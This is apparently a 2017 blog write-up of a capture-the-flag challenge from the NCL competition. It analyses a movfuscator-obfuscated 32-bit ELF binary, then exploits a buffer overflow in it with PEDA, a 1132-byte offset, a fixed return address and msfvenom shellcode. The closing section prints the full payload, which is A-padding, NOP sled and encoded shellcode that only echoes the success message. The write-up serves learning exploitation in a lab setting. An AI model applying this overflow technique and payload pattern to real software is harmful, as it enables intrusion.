This is more going to be a walkthrough of how I conduct my analysis of an unknown ELF file. I am by no means an expert and appreciate any feedback given. Enjoy!

Some background information to this, the file was provided during the NCL Spring 2017 Postseason competition under the "Enumeration and Exploitation" category.

Static Analysis

First thing's first lets run the file command on it to see exactly what type of file this is.

File Information

From this we've learned two things..

It's an ELF 32 bit executable in LSB (Least Significant Bit) form.
It's not stripped, meaning it still contains debugging information.

ELF Header

A few new interesting points from this.

The entry point is at 0x80483dc (0x080483dc).
The program headers start at 52 bytes and is 32 bytes in size.
The section headers start at 10279512 bytes and is 40 bytes in size.

Section Headers

So .text (1), .data (2), and .bss (3) should be loaded into the program at the following address ranges:

0x080483dc - 0x080592bb
0x0805b030 - 0x0860475c
0x08604760 - 0x08804770

Also the symbols table (.symtab) is 2,126,656 bytes. Which is not something that's common, that's absolutely massive.

Program Headers

So this program contains six segments, of those 2 are LOAD segments which are loadable segments.
The first loadable segment (02) contains .text with the read + execute (R E) flag.
The second (03) contains .data and .bss with read + write (RW) flag.

Time to take a look at the symbols table and...it is indeed massive with a large amount of symbols in the format of "alu_XX", seems like this ELF is obfuscated in some way or another. We'll grep out all of the symbols containing "alu" for the time being to get a better look at the programs symbols.

Symbols Table

18: 00000000 0 FILE LOCAL DEFAULT ABS /root/tools/movfuscator/b

Seems like the program is using movfuscator to obfuscate the code, which is the reasoning for all of the "alu" symbols. Here's some other symbols that peaked my interest.

def_not_the_flag
discard
validate
main

We can now start looking at strings, however, due to it being obfuscated it's pretty obvious there's going to be alot of noise. I couldn't even get all of the strings into a gist without it freezing on me so I cut out most of the redundancies/noise.

Strings

Few interesting strings to note:

this doesn't seem right... try again
whooooo, you got it!
I guess, uh... type in a passcode:
usage: %s tid
SKY-ALTF-4810 (This is def_not_the_flag)

Without even running the program we know that you need to run the program with your TID (team identifier) as a parameter. The program will then ask you for an input and then print back whether it's correct or it's not. The flag never gets called or anything but it's still kinda neat.

I'm going to use radare2 as my disassembler to disassemble the main function of the program.

Disassembling Main

We don't get much useful information from this as the program is obfuscated with that movfuscator program. Movfuscator replaces all instructions with MOV, you can read more about it here. To get some more meaningful information we need to move on to more dynamic analysis.

Dynamic Analysis

I want to verify that the memory locations are the same as what I observed in the static analysis. Lets force the program to run in the background with ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 & and then read the memory mapping of the programs PID with cat /proc/*PID*/maps.

Memory Mapping

We can see that we have 4 memory regions for this program.

08048000-0805a000 r-xp 00000000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805a000-0805b000 r-xp 00011000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805b000-08605000 rwxp 00012000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
08605000-08805000 rwxp 00000000 00:00 0

(1) is .text and it's associated executable parts.
(2) is the .dynamic/.got.plt sections which is the ld-linux.so.2 interpreter.
(3) is .data.
(4) is .bss.

We're finally prepared to actually see what this program is doing, the easiest way to do this is strace which traces the system calls and signals when a program's running.

Strace

Well as expected it prints "I guess, uh... type in a passcode: " and then asks for user input. The program then gets stuck in some form of countdown loop, sending SIGILL (illegal instruction) signals at 0x80592b9 followed by SIGSEGV (segmentation fault) signals. It repeats this loop for the length of the TID. 20 length is 20 loops. The output here is cut-down for readability.

Fuzzing and Exploitation

We can get right to testing this program by sending 2000 A's to STDIN and monitoring what happens with strace.

Testing Input

...and it's stuck looping forever with a Segmentation Fault at 0x41414141 which is 4 A's. Lets verify this more in GDB.

Before jumping into GDB I wholeheartedly recommend you install PEDA (Python Exploit Development Assistance) for GDB as it makes your life in GDB tenfold easier.

Alright so lets push 2000 A's into a file called inp and then have gdb input that file's contents whenever it hits a STDIN point. We will also be setting SIGSEGV signals to be passed to gdb so it can continue whenever it hits an error with handle SIGSEGV pass.

Verifying in GDB

On the SIGSEGV we can see that our stack is loaded with our input of A's at 0x086041c8. We can also verify this searching for a string of A's in memory with find AAAAAAAAAAAAAAA which results in the memory address of 0x86041c8. So our input is being stored in the .data segment of memory which is going to be static making jumping to our shellcode super simple.

Before we create our return address we first need to find the offset needed for the overflow. The easiest way to do this is with PEDA's pattern_create feature. Let's create a pattern of 2000 bytes and store it into our inp file with pattern_create 2000 inp.

Finding offset with PEDA

The segmentation fault is now at 0x416b6e41, Plugging that into PEDA's pattern_offset feature results in an offset of 1132 bytes before the overflow/where we can place our return address.

Now all we need to do is find a return address which we can find with a mock exploit program to see where are values are statically stored.

Mock Exploit

So when the program crashes with an address of BBBB (\x42424242) we can use PEDA's find feature to locate our mock shellcode of C's.

Testing our Mock Exploit

Our C's start at 0x8604638 (end of .data segment) which isn't going to change allowing us to put this address as our return address to jump directly to our shellcode without any guessing. Once we reformat this address to little endian and cut it into bytes our return address is going to be \x38\x46\x60\x08.

The entire point of this NCL challenge is to input the correct passcode to get the output of "whooooo, you got it!" so why don't we go ahead and cheat our way to that response. I'm extremely lazy so lets just generate some shellcode with msfvenom to execute the command "echo whooooo, you got it!".

I had to block the characters of \x00 (for obvious reasons), \xcb, \x0c, and \x0d as those characters will split the output into multiple lines. Our program won't read input on multiple lines so if it's split it'll only run a portion of the shellcode until it hits that split causing a segmentation fault (due to only partial execution of the shellcode).

Generating Our Shellcode

Now all we've got to do is put all the pieces together.

Writing Our Exploit

Now lets run our exploit to get our "well deserved" message.

"Winning"

So NCL, my question is, do you accept an answer of.. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x38\x46\x60\x08\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xcf\x9b\x5e\x2b\xda\xc9\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1\x10\x31\x43\x13\x83\xeb\xfc\x03\x43\xc0\x79\xab\x41\xd5\x25\xcd\xc4\x8f\xbd\xc0\x8b\xc6\xd9\x73\x63\xab\x4d\x84\x13\x64\xec\xed\x8d\xf3\x13\xbf\xb9\x19\xd4\x40\x3a\x78\xb7\x28\x55\xa2\x40\xc1\xc6\xcd\xc1\x7e\x76\x3d\x3e\xf8\xe7\x48\x1e\x9d\x98\xc6\x7e\x08\x13\x07\x7f\x9d\x88\xce\x9e\xec\xaf?

No? Oh, well it was fun anyways!

Security and Stuff

Tuesday, July 4, 2017

Can't Figure Out The Answer To A CTF Challenge? Just Exploit It!